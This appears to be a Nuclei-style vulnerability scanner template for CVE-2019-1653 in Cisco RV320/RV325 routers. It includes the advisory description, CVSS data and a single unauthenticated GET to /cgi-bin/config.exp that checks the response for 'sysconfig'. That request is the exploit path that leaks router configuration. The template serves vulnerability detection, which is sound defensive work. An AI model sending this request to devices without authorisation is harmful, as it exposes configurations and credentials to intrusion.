34 lines
1.4 KiB
YAML
34 lines
1.4 KiB
YAML
id: CVE-2019-1653
|
|
|
|
info:
|
|
name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.
|
|
The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit
|
|
could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.
|
|
reference:
|
|
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
|
|
- https://www.exploit-db.com/exploits/46262/
|
|
- https://www.exploit-db.com/exploits/46655/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-1653
|
|
cwe-id: CWE-200
|
|
tags: cve,cve2019,cisco
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/config.exp"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "sysconfig"
|
|
part: body
|